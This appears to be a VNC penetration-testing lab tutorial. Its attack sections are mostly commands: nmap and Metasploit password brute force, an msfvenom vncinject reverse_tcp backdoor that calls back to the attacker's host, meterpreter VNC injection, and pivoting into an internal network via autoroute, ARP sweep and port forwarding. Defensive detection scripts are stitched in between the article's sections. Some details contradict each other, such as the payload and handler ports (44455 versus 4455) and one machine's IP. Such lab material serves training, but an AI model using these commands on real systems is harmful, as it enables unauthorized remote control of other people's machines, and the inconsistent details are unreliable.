Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction. It uses port 5900: VNC and 5901: VNC-1.
Penetration Lab Requirements
VNC Server: Ubuntu
Attacker system: Kali Linux
Client system: Windows (TightVNC Viewer)

Let’s start!!

VNC Installation

Open the terminal and follow the steps given below, executing each command, for VNC installation.
The command given below installs the desktop (Unity) as well as several packages that are required for the graphical interface to work properly.


sudo apt-get install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal


Now type following command for VNC server installation.
sudo apt-get install vnc4server

The command given below sets your server password, which is required for VNC login.
sudo vncpasswd

The password should be at least 6 characters; here I set the server password 098765 for VNC authentication.


Type given below command to run VNC
sudo vncserver :1

It is required to kill the process if you want to make some changes in running VNC server.
sudo vncserver -kill :1

Now type following command in order to open VNC startup file for making some changes.
sudo gedit ~/.vnc/xstartup


Add the lines given below to the startup file, as shown in the given image, and save the changes.
exec gnome-session &
exec gnome-panel &
exec gnome-settings-daemon &
exec metacity &


Execute given below command to set resolution of Desktop screen.
sudo vncserver :1 -geometry 1024x768 -depth 24

After following above 7 steps check service status of VNC server using given below command.
sudo netstat -tnl |grep 5901
From the given image you can confirm that port 5901 is listening.


Connecting a Windows client to the VNC server
TightVNC is a free remote control software package that helps a client connect to a VNC server. I have downloaded it on the client machine so that it can connect to the VNC server.

Run TightVNC Viewer and enter the server IP and port number [192.168.1.218:5901] as shown in the given image, then click on Connect.

The client will get a VNC authentication popup; enter the server password which you set above.


From the given image you can observe that the Windows client has connected to the Ubuntu server, can access its desktop and can control its mouse and keyboard.


Scanning Target IP for Enumeration
Scanning plays an important role in penetration testing because through scanning the attacker learns which services and open ports are available for enumeration and attack.
Here we are using nmap for scanning ports and protocols.
nmap -sT 192.168.1.218
If the service is running on the targeted server, nmap shows the STATE open for port 5901.

Use nmap script for VNC version

The following nmap command queries a VNC server for its protocol version and supported security types.

nmap -p 5901 --script vnc-info 192.168.1.218

From the image given below you can see that it has shown protocol version 3.8 and security type 2: VNC Authentication.
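What vnc-info reads off the wire is the RFB handshake: the server's 12-byte ProtocolVersion greeting ("RFB 003.008\n") followed, for RFB 3.7/3.8, by a one-byte count and the list of security types it offers (for RFB 3.3 the server instead dictates a single 32-bit type). The parser below is an added example, not code from the article or from nmap; the sample bytes are constructed to match the version and security type reported above, and it flags the two things a defender cares about in that list: a server that offers type 1 (None, no password) and a server whose only option is type 2 (VNC Authentication, a DES challenge-response with an unencrypted session afterwards).

```python
import struct

# RFB security type numbers from the RFB protocol specification.
SECURITY_TYPES = {
    1: "None",
    2: "VNC Authentication",
    5: "RA2",
    6: "RA2ne",
    16: "Tight",
    18: "TLS",
    19: "VeNCrypt",
}


def parse_rfb_version(greeting: bytes):
    """Parse the 12-byte ProtocolVersion message 'RFB xxx.yyy\\n' the server sends first."""
    if len(greeting) < 12 or greeting[:4] != b"RFB " or greeting[11:12] != b"\n":
        raise ValueError("not an RFB ProtocolVersion greeting")
    return int(greeting[4:7]), int(greeting[8:11])


def parse_security_types(version, payload: bytes):
    """Return the security type numbers the server offers after version agreement."""
    if version < (3, 7):
        # RFB 3.3: the server dictates one type as a big-endian U32 (0 = connection failed).
        (chosen,) = struct.unpack("!I", payload[:4])
        if chosen == 0:
            raise ConnectionError("server refused connection")
        return [chosen]
    # RFB 3.7 and 3.8: U8 count, then that many U8 type numbers; count 0 carries a reason string.
    count = payload[0]
    if count == 0:
        (reason_len,) = struct.unpack("!I", payload[1:5])
        reason = payload[5:5 + reason_len].decode("latin-1")
        raise ConnectionError(f"server refused connection: {reason}")
    return list(payload[1:1 + count])


def assess_vnc_greeting(greeting: bytes, payload: bytes):
    """Summarise version, offered security types and the weaknesses visible from them."""
    version = parse_rfb_version(greeting)
    types = parse_security_types(version, payload)
    findings = []
    if 1 in types:
        findings.append("security type None offered: no password required")
    if 2 in types and not any(t in (18, 19) for t in types):
        findings.append("VNC Authentication only: DES challenge-response, session unencrypted")
    return {
        "version": "%d.%d" % version,
        "security_types": [SECURITY_TYPES.get(t, "unknown(%d)" % t) for t in types],
        "findings": findings,
    }


# Constructed sample bytes matching what the vnc-info output above reports.
SAMPLE_GREETING = b"RFB 003.008\n"
SAMPLE_SECURITY = b"\x01\x02"  # one type offered: 2 = VNC Authentication

if __name__ == "__main__":
    print(assess_vnc_greeting(SAMPLE_GREETING, SAMPLE_SECURITY))
```

The payload bytes are exactly what a client receives after it echoes the version string back, so the same functions can be pointed at a captured handshake from a pcap when reviewing what a VNC server on your own network exposes.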


Use nmap script for VNC brute force attack

The following nmap command performs brute force password auditing against the VNC server using a password dictionary.

nmap -p 5901 --script vnc-brute 192.168.1.218 --script-args passdb=/root/desktop/pass.txt

Great!! From the image given below you can read the valid password: 098765


Use Metasploit for VNC brute force attack

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set rhosts 192.168.1.218
msf auxiliary(vnc_login) > set rport 5901
msf auxiliary(vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run

Awesome!! From the image given below you can observe that the same password, 098765, has been found by Metasploit.
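Both the nmap vnc-brute run and the Metasploit vnc_login run above leave the same footprint on the server: a burst of authentication failures from one client address, often followed by one success once the dictionary hits. The detector below is an added example, not code from the article or from Metasploit; it runs over constructed log lines (the line layout is a simplified form of what Xvnc writes to ~/.vnc/*.log, not the exact text) and raises an alert when a source IP accumulates a threshold of failures inside a sliding window, marking the alert separately when a successful login from that IP follows the burst, which is the case to escalate.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (simplified, not the exact Xvnc text):
# "<date> <time> <client ip>::<client port> <message>"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})::(?P<port>\d+) (?P<msg>.+)$"
)


def parse_line(line):
    """Return a dict with timestamp, client IP and message, or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), "ip": m["ip"], "msg": m["msg"]}


def detect_vnc_bruteforce(lines, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold authentication failures inside a sliding window,
    and record whether a successful login from that IP followed the burst."""
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    alerts = {}                  # ip -> alert record
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if "AuthFailureException" in rec["msg"]:
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > timedelta(seconds=window_seconds):
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"ip": ip, "count": 0, "first": q[0],
                                           "last": ts, "success_after_burst": False})
                a["count"] = max(a["count"], len(q))
                a["last"] = ts
        elif "authenticated" in rec["msg"].lower() and ip in alerts:
            # A success right after a failure burst means a guessed password worked.
            alerts[ip]["success_after_burst"] = True
    return sorted(alerts.values(), key=lambda a: a["first"])


# Constructed sample: a dictionary run from the attacker IP used above, then one ordinary
# user who mistypes once and then logs in.
SAMPLE_LOG = [
    "2017-03-18 10:12:01 192.168.1.216::43210 SConnection: AuthFailureException: Authentication failure",
    "2017-03-18 10:12:03 192.168.1.216::43211 SConnection: AuthFailureException: Authentication failure",
    "2017-03-18 10:12:05 192.168.1.216::43212 SConnection: AuthFailureException: Authentication failure",
    "2017-03-18 10:12:07 192.168.1.216::43213 SConnection: AuthFailureException: Authentication failure",
    "2017-03-18 10:12:09 192.168.1.216::43214 SConnection: AuthFailureException: Authentication failure",
    "2017-03-18 10:12:11 192.168.1.216::43215 SConnection: AuthFailureException: Authentication failure",
    "2017-03-18 10:12:13 192.168.1.216::43216 SConnection: Client authenticated",
    "2017-03-18 10:15:40 192.168.1.50::51234 SConnection: AuthFailureException: Authentication failure",
    "2017-03-18 10:15:52 192.168.1.50::51235 SConnection: Client authenticated",
]

if __name__ == "__main__":
    for alert in detect_vnc_bruteforce(SAMPLE_LOG):
        print(alert)
```

The threshold and window are deliberately loose; a dictionary run like the ones above produces failures a second or two apart, so five in a minute separates it cleanly from a user fumbling a password.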


Attacker connecting to the VNC server
Open a new terminal and type the following command to connect to the VNC server using the password found above, 098765:
vncviewer 192.168.1.218:5901

Nice!! You can see that after a successful brute force attack an attacker can easily connect to the VNC server.


Capture VNC Session of a Windows Remote system using Msfvenom
Create a VNC payload using msfvenom and try to get a VNC session on the victim's PC.
Open the terminal in your Kali Linux and type the following command to generate a VNC payload with msfvenom.
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=44455 -f exe > /var/www/html/vnc.exe
The above command will generate an exe file for the VNC payload in /var/www/html of Kali Linux.

As the attacker you need to send this backdoor to the target and start multi/handler in the Metasploit framework.
msfconsole
use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.216
msf exploit(handler) > set lport 4455
msf exploit(handler) > set viewonly false
msf exploit(handler) > run

Now the attacker tries to connect to the target using the VNC payload; from the given screenshot you can see it has launched vncviewer and our session 1 is running in the background.

Here you can see the desktop screen of the victim's PC to which the attacker is connected.

Another way to Capture a VNC Session of a Windows Remote system
Suppose you have already exploited a Windows system and got a reverse connection from the victim's system through a meterpreter session.
Type the command given below, which injects a VNC DLL via a reflective loader (staged) and connects back to the attacker.

Meterpreter > run vnc


Great!! Again the attacker is connected to the victim's system.


Secure VNC server through port forwarding
Open the vncserver setup file using the command given below:
sudo gedit /usr/bin/vncserver


Follow the steps given below for making the changes:
Add # to comment out "vncPort = 5900"
Add a new line, as shown in the given image, to move the VNC service to another port: vncPort = 8800;


Now try to connect to the VNC server through port 8800, as connected above through TightVNC Viewer, and enter the password.


Hence you can see the VNC connection has been established successfully.

VNC tunneling over SSH

In the previous article we performed VNC penetration testing, and today you will see VNC tunneling, used to connect a remote machine to a VNC server when they belong to different network interfaces.

Basically, tunneling is a process which allows data sharing or communication between two different networks privately. Tunneling is normally performed by encapsulating the private network data and protocol information inside the public network transmission units, so that the private network protocol information is visible to the public network only as data.

Let’s Begin!!

Requirements:
Server machine (Ubuntu): two network interfaces with the SSH service running
Local machine (Ubuntu): VNC service running
Remote machine (Windows): with TightVNC Viewer installed


In the following image we explain the VNC tunneling process, where a remote PC with IP 192.168.1.225 is trying to connect to 10.0.0.20, which is on the intranet of another network. To establish a connection with the local machine, the remote PC will create a VNC tunnel which connects to the local system via the SSH server machine.



The image given below shows the network configuration of the server machine (SSH), where it has two IPs, 192.168.1.226 and 10.0.0.10, as explained above.


Another image given below shows the network configuration of the local machine, which has IP 10.0.0.20.


Check that the VNC service is running using the following command:
netstat -tlp
From the given image you can see the highlighted text showing that port 5900 is listening on the local machine.
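Two things are worth checking in that netstat output, and they also apply to the port-forwarding section of the previous article: moving VNC from 5900 to 8800 only hides it from a default scan (a full port scan still finds the listener and the RFB greeting identifies it), and what actually keeps a VNC server off the network is binding it to loopback (the -localhost option of vncserver) so that it is reachable only through an SSH tunnel like the one built below. The audit below is an added example, not code from the article; it parses constructed netstat -tln style output (the real column layout, sample rows made up for this example) and reports which VNC listeners, including a relocated port you name, are reachable from the network rather than from localhost only.

```python
# Constructed 'netstat -tln' style output; the columns mirror the real layout,
# the rows are made up for this example.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp6       0      0 :::8800                 :::*                    LISTEN
"""

LOOPBACK_ADDRS = {"127.0.0.1", "::1"}


def parse_listeners(netstat_output):
    """Return (proto, bind address, port) for every TCP socket in LISTEN state."""
    listeners = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp") or fields[5] != "LISTEN":
            continue
        # rpartition handles both "0.0.0.0:5900" and the IPv6 wildcard ":::8800".
        addr, _, port = fields[3].rpartition(":")
        listeners.append((fields[0], addr, int(port)))
    return listeners


def is_vnc_port(port, extra_ports=()):
    # Display :N listens on 5900 + N; extra_ports covers a relocated port such as 8800 above.
    return 5900 <= port <= 5999 or port in extra_ports


def audit_vnc_exposure(netstat_output, extra_ports=()):
    """Split VNC listeners into those reachable from the network and those bound to loopback only."""
    exposed, loopback_only = [], []
    for _proto, addr, port in parse_listeners(netstat_output):
        if not is_vnc_port(port, extra_ports):
            continue
        # Anything not bound to a loopback address (wildcard or a real interface IP) is reachable.
        if addr in LOOPBACK_ADDRS:
            loopback_only.append(port)
        else:
            exposed.append(port)
    return {"exposed": sorted(exposed), "loopback_only": sorted(loopback_only)}


if __name__ == "__main__":
    print(audit_vnc_exposure(SAMPLE_NETSTAT, extra_ports=(8800,)))
```

Run against the real output of netstat -tln (or ss -tln, whose address and state columns parse the same way) on the VNC host, an empty "exposed" list is the state you want before relying on the SSH tunnel.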


Open the terminal on the server machine (IP 10.0.0.10) and type the following command to connect to the VNC machine (IP 10.0.0.20):
vncviewer 10.0.0.20


Great!! The local machine is successfully connected.


Similarly, using TightVNC Viewer, the remote machine (192.168.1.225) now tries to connect to the local machine (IP: 10.0.0.10) as shown in the given image.

Since they belong to different networks, it receives a network error.


Follow the steps given below to connect the remote machine to the local machine via the SSH server.
·         Open a TightVNC connection and enter the local machine IP 10.0.0.20 with port 5900.
·         Enable SSH tunneling.
·         Now enter the SSH server IP 192.168.1.226 with port 22 and the SSH server username: ubuntu.
Congrats!!! The remote machine has successfully connected to the local machine through VNC.

VNC Pivoting through Meterpreter

In previous articles we described VNC penetration testing and VNC tunneling through SSH, but today we are going to demonstrate VNC pivoting.

From Offensive Security
Pivoting is a technique to get inside an unreachable network with the help of a pivot (centre point). In simple words it is an attack through which an attacker can exploit those systems which belong to a different network. For this attack, the attacker needs to exploit the main server, which helps the attacker to add himself inside its local network, and then the attacker will be able to target the client system for attack.
Lab Setup requirements:
Attacker machine: Kali Linux
Pivot Machine: Ubuntu operating system with two network interfaces

Target Machine: Ubuntu (with the VNC service enabled)


Exploit pivot machine
Generate a payload using msfvenom and start multi/handler to hack the pivot machine (Ubuntu); read the complete article from here, and bypass its UAC to achieve admin privileges.
sessions
From the given image you can confirm that I own a meterpreter session on the pivot machine (192.168.1.226).

Verify network interface of pivot

Check the network interfaces with the following command:
Meterpreter> ifconfig
From the given image you can observe two network interfaces on the pivot's system: the 1st with IP 192.168.1.226, through which the attacker is connected, and the 2nd with IP 10.0.0.1, through which the VNC servers (targets) are connected.


Use autoroute post exploit

Since the attacker belongs to the 192.168.1.1 network and the client belongs to the 10.0.0.0 network, it is not possible to attack the client network directly unless the attacker acquires a connection into that network. In order to reach the 10.0.0.0 network the attacker needs to run the post exploitation module "autoroute".
use post/multi/manage/autoroute 
msf post(autoroute) > set session 3
msf post(autoroute) > exploit


Use ARP Sweep to identify Active host
This module enumerates alive hosts in the local network using ARP requests. Take the MAC address and other details from the target-side network interface of the pivot, as shown above.

use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > set rhost 10.0.0.1-254
msf auxiliary(arp_sweep) > set shost
msf auxiliary(arp_sweep) > set smac 00:0c:29:bf:43:94
msf auxiliary(arp_sweep) > run

Here we found a new host, IP 10.0.0.20, as shown in the given image. Let's perform a TCP port scan for active services on this machine.
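From the target network's side, the arp_sweep above is indistinguishable from the pivot host itself asking for addresses, because the module sends with the pivot's own MAC and IP (the smac value set above). What gives it away is the pattern, not the sender: one MAC asking who-has for a long run of addresses in a couple of seconds. The detector below is an added example, not code from the article or from Metasploit; it works on constructed ARP request records in a tcpdump-like layout and alerts when one sender MAC asks for at least a threshold of distinct target IPs inside a short window. The sweep rows reuse the pivot's MAC and 10.0.0.0 addresses from this article as sample values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed record layout (tcpdump-like, simplified):
# "<date> <time.ms> who-has <target ip> tell <sender ip> (<sender mac>)"
ARP_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) who-has (?P<target>\d+\.\d+\.\d+\.\d+) "
    r"tell (?P<sender>\d+\.\d+\.\d+\.\d+) \((?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\)$"
)


def parse_arp(line):
    """Return the parsed ARP request, or None for lines that are not ARP requests."""
    m = ARP_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            "target": m["target"], "sender": m["sender"], "mac": m["mac"]}


def detect_arp_sweep(lines, min_targets=16, window_seconds=5):
    """Alert on any sender MAC that asks for >= min_targets distinct IPs within window_seconds."""
    per_mac = defaultdict(list)  # mac -> [(ts, target, sender ip)]
    for line in lines:
        rec = parse_arp(line)
        if rec:
            per_mac[rec["mac"]].append((rec["ts"], rec["target"], rec["sender"]))
    alerts = []
    for mac, events in per_mac.items():
        events.sort()
        start, best, best_span = 0, 0, None
        for end in range(len(events)):
            # Slide the window start forward until the window fits within window_seconds.
            while events[end][0] - events[start][0] > timedelta(seconds=window_seconds):
                start += 1
            distinct = len({target for _, target, _ in events[start:end + 1]})
            if distinct > best:
                best, best_span = distinct, (events[start][0], events[end][0])
        if best >= min_targets:
            alerts.append({"mac": mac, "sender_ip": events[0][2], "distinct_targets": best,
                           "window_start": best_span[0], "window_end": best_span[1]})
    return alerts


def _constructed_sample():
    """Constructed traffic: a sweep of 10.0.0.1-40 from the pivot's MAC, plus two normal requests."""
    lines = []
    base = datetime(2017, 3, 18, 11, 0, 0)
    for i in range(1, 41):
        ts = base + timedelta(milliseconds=50 * i)
        stamp = f"{ts:%Y-%m-%d %H:%M:%S.%f}"[:-3]  # trim microseconds to milliseconds
        lines.append(f"{stamp} who-has 10.0.0.{i} tell 10.0.0.1 (00:0c:29:bf:43:94)")
    # A workstation resolving its gateway and a file server: two targets, no alert.
    lines.append("2017-03-18 11:00:30.100 who-has 10.0.0.1 tell 10.0.0.20 (00:0c:29:aa:bb:cc)")
    lines.append("2017-03-18 11:00:31.400 who-has 10.0.0.5 tell 10.0.0.20 (00:0c:29:aa:bb:cc)")
    return lines


SAMPLE_ARP = _constructed_sample()

if __name__ == "__main__":
    for alert in detect_arp_sweep(SAMPLE_ARP):
        print(alert)
```

The same per-MAC distinct-target count is what a switch-side or IDS ARP monitor keeps; the threshold of sixteen distinct targets in five seconds is far above anything a host does on its own, so the sweep of a /24 as shown above stands out even when it is throttled.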


Use TCP Port Scan post exploit

This module enumerates the open TCP ports of the target system.
use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 10.0.0.20
msf auxiliary(tcp) > set threads 10
msf auxiliary(tcp) > exploit
From the given image you can observe that port 5900 is open, and we know that port 5900 is used for the VNC service.

VNC brute force attack

In order to obtain the password for unauthorized access to the VNC machine, apply a brute force attack using a password dictionary with the module given below.
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set rhosts 10.0.0.20
msf auxiliary(vnc_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run
Awesome!! From the image given below you can observe that the password 123456 has been found by Metasploit.

VNC Port forwarding on Local port
Now type the following command to forward the target's VNC port to a port on localhost:
Meterpreter> portfwd add -l 6000 -p 5900 -r 10.0.0.20
-l: the local port to listen on.
-p: the remote port to connect to.
-r: the remote host address to connect to.

Now open the terminal and type the following command to connect to the target machine through the forwarded port:
vncviewer 127.0.0.1:6000
Wonderful!! We have successfully gained unauthorized access to the VNC server through the pivot.
